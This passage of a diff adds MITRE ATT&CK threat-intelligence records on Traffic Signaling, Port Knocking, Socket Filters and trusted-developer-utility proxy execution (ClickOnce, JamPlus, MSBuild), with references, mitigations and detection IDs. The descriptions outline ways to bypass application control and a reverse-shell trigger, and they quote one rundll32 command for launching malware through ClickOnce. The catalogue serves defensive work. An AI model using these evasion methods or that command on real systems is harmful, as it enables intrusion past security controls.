interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1205",
+                            "external_id": "T1205"
+                        },
+                        {
+                            "source_name": "Bleeping Computer - Ryuk WoL",
+                            "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.",
+                            "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/"
+                        },
+                        {
+                            "source_name": "AMD Magic Packet",
+                            "description": "AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.",
+                            "url": "https://www.amd.com/system/files/TechDocs/20213.pdf"
+                        },
+                        {
+                            "source_name": "Mandiant - Synful Knock",
+                            "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        },
+                        {
+                            "source_name": "Hartrell cd00r 2002",
+                            "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
+                            "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Josh Day, Gigamon",
+                        "Tony Lee"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 22:44:32.591000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0524: Traffic Signaling (Port-knock / magic-packet \u2192 firewall or service activation) \u2013 T1205"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-07-01 18:23:25.002000+00:00",
+                    "modified": "2026-05-12 15:12:00.688000+00:00",
+                    "name": "Port Knocking",
+                    "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1205/001",
+                            "external_id": "T1205.001"
+                        },
+                        {
+                            "source_name": "Hartrell cd00r 2002",
+                            "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
+                            "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.688000+00:00\", \"old_value\": \"2026-04-15 22:44:49.425000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0302: Port-knock \u2192 rule/daemon change \u2192 first successful connect (T1205.001)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-30 21:18:41.930000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Socket Filters",
+                    "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1205/002",
+                            "external_id": "T1205.002"
+                        },
+                        {
+                            "source_name": "exatrack bpf filters passive backdoors",
+                            "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.",
+                            "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf"
+                        },
+                        {
+                            "source_name": "Leonardo Turla Penquin May 2020",
+                            "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.",
+                            "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf"
+                        },
+                        {
+                            "source_name": "haking9 libpcap network sniffing",
+                            "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.",
+                            "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "CrowdStrike",
+                        "Tim (Wadhwa-)Brown"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2026-04-15 22:45:22.463000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0162: Socket-filter trigger \u2192 on-host raw-socket activity \u2192 reverse connection (T1205.002)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:39.262000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Trusted Developer Utilities Proxy Execution",
+                    "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.\n\nSmart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage \"reputation hijacking\" to abuse an operating system\u2019s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1127",
+                            "external_id": "T1127"
+                        },
+                        {
+                            "source_name": "Exploit Monday WinDbg",
+                            "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20160816135945/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
+                        },
+                        {
+                            "source_name": "Elastic Security Labs",
+                            "description": "Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.",
+                            "url": "https://www.elastic.co/security-labs/dismantling-smart-app-control"
+                        },
+                        {
+                            "source_name": "LOLBAS Tracker",
+                            "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"
+                        },
+                        {
+                            "source_name": "Microsoft Smart App Control",
+                            "description": "Microsoft. (n.d.). Smart App Control Frequently Asked Questions. Retrieved April 4, 2025.",
+                            "url": "https://support.microsoft.com/en-us/windows/smart-app-control-frequently-asked-questions-285ea03d-fa88-4d56-882e-6698afdb7003"
+                        },
+                        {
+                            "source_name": "engima0x3 RCSI Bypass",
+                            "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.",
+                            "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/"
+                        },
+                        {
+                            "source_name": "engima0x3 DNX Bypass",
+                            "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.",
+                            "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Casey Smith",
+                        "Matthew Demaske, Adaptforward"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 22:45:17.637000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0172: Behavior-chain, platform-aware detection strategy for T1127 Trusted Developer Utilities Proxy Execution (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-09-09 14:39:28.637000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "ClickOnce",
+                    "description": "Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)\n\nBecause ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.\n\nClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)\n\nAdversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)\n\nAdditionally, an adversary can move the ClickOnce application file to a remote user\u2019s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1127/002",
+                            "external_id": "T1127.002"
+                        },
+                        {
+                            "source_name": "LOLBAS /Dfsvc.exe",
+                            "description": "LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"
+                        },
+                        {
+                            "source_name": "Microsoft Learn ClickOnce",
+                            "description": "Microsoft. (2023, September 14). ClickOnce security and deployment. Retrieved September 9, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022"
+                        },
+                        {
+                            "source_name": "SpectorOps Medium ClickOnce",
+                            "description": "Nick Powers. (2023, June 7). Less SmartScreen More Caffeine: (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.",
+                            "url": "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5"
+                        },
+                        {
+                            "source_name": "NetSPI ClickOnce",
+                            "description": "Ryan Gandrud. (2015, March 23). All You Need Is One \u2013 A ClickOnce Love Story. Retrieved September 9, 2024.",
+                            "url": "https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/"
+                        },
+                        {
+                            "source_name": "Burke/CISA ClickOnce Paper",
+                            "description": "William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution & C2. Retrieved September 9, 2024.",
+                            "url": "https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894"
+                        },
+                        {
+                            "source_name": "Burke/CISA ClickOnce BlackHat",
+                            "description": "William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU\u2019RE IN: When .appref-ms abuse is operating as intended. Retrieved September 9, 2024.",
+                            "url": "https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Wirapong Petshagun"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 22:45:37.624000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1045: Code Signing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0191: Behavior-chain detection strategy for T1127.002 Trusted Developer Utilities Proxy Execution: ClickOnce (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7d356151-a69d-404e-896b-71618952702a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-21 13:36:48.710000+00:00",
+                    "modified": "2026-05-12 15:12:00.645000+00:00",
+                    "name": "JamPlus",
+                    "description": "Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)\n\nAdversaries may abuse the `JamPlus` build utility to execute malicious scripts via a `.jam` file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.(Citation: Cyble)(Citation: Elastic Security Labs)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1127/003",
+                            "external_id": "T1127.003"
+                        },
+                        {
+                            "source_name": "Cyble",
+                            "description": "Cyble. (2024, September 9). Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC). Retrieved March 21, 2025.",
+                            "url": "https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/"
+                        },
+                        {
+                            "source_name": "Elastic Security Labs",
+                            "description": "Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.",
+                            "url": "https://www.elastic.co/security-labs/dismantling-smart-app-control"
+                        },
+                        {
+                            "source_name": "JamPlus manual",
+                            "description": "Perforce Software, Inc.. (n.d.). JamPlus manual: Quick Start Guide. Retrieved March 21, 2025.",
+                            "url": "https://jamplus.github.io/jamplus/quick_start.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.645000+00:00\", \"old_value\": \"2026-04-15 22:45:43.373000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0585: Behavior-chain detection strategy for T1127.003 Trusted Developer Utilities Proxy Execution: JamPlus (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-27 21:50:26.042000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "MSBuild",
+                    "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1127/001",
+                            "external_id": "T1127.001"
+                        },
+                        {
+                            "source_name": "LOLBAS Msbuild",
+                            "description": "LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"
+                        },
+                        {
+                            "source_name": "Microsoft MSBuild Inline Tasks 2017",
+                            "description": "Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element"
+                        },
+                        {
+                            "source_name": "MSDN MSBuild",
+                            "description": "Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.",
+                            "url": "https://msdn.microsoft.com/library/dd393574.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "@ionstorm",
+                        "Carrie Roberts, @OrOneEqualsOne"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 22:45:30.815000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0556: Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Trusted Relationship",
